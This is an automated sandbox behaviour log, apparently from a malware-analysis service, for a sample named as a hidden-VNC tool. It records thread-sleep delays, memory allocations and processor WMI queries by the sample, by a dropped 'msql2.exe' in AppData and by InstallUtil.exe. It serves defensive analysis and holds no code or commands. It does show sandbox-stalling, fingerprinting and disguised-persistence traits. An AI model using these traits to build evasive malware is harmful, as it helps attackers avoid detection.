Source: C:\Users\user\AppData\Roaming\msql2.exe	Memory allocated: 1A30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: D30000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 29F0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2750000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 599822	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 599691	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 598390	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 597932	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 597481	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599339	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597888	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597655	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597319	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598881	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598421	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 598091	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597981	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597854	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597718	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597580	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Thread delayed: delay time: 597362	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Window / User API: threadDelayed 1372	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Window / User API: threadDelayed 3057	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 7564	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 2236	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Window / User API: threadDelayed 1933	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Window / User API: threadDelayed 2454	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Window / User API: threadDelayed 1359	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Window / User API: threadDelayed 2852	Jump to behavior

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2132	Thread sleep count: 1372 > 30	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -599822s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2132	Thread sleep count: 3057 > 30	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -599691s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -599563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -598953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -598719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -598609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -598500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -598390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -598281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -598172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -598062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -597932s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -597828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -597481s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676	Thread sleep time: -597374s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2800	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -37000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3604	Thread sleep count: 7564 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3604	Thread sleep count: 2236 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -36890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -36781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -36671s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -36562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -36453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -36317s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -36181s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -36076s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -35968s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -35859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -35749s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -35640s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -35531s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -35421s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -35312s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -35203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -35093s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -34984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -34865s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -34747s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -34638s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -34530s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -34421s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -34312s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -34203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -34093s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -33984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -33874s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -33765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -33656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -33546s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -33437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -33328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -33218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -33109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -32999s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -32890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -32781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -32671s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -32562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -32447s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -32343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -32186s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -31934s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352	Thread sleep time: -31828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -15679732462653109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 4428	Thread sleep count: 1933 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 4428	Thread sleep count: 2454 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -599339s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -598156s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -597888s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -597655s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -597546s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -597319s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032	Thread sleep time: -597203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6016	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 648	Thread sleep count: 1359 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 648	Thread sleep count: 2852 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -598881s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -598750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -598640s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -598421s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -598091s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -597981s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -597854s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -597718s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -597580s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244	Thread sleep time: -597362s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3852	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 599822	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 599691	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Thread delayed: delay time: 598390	Jump to behavior
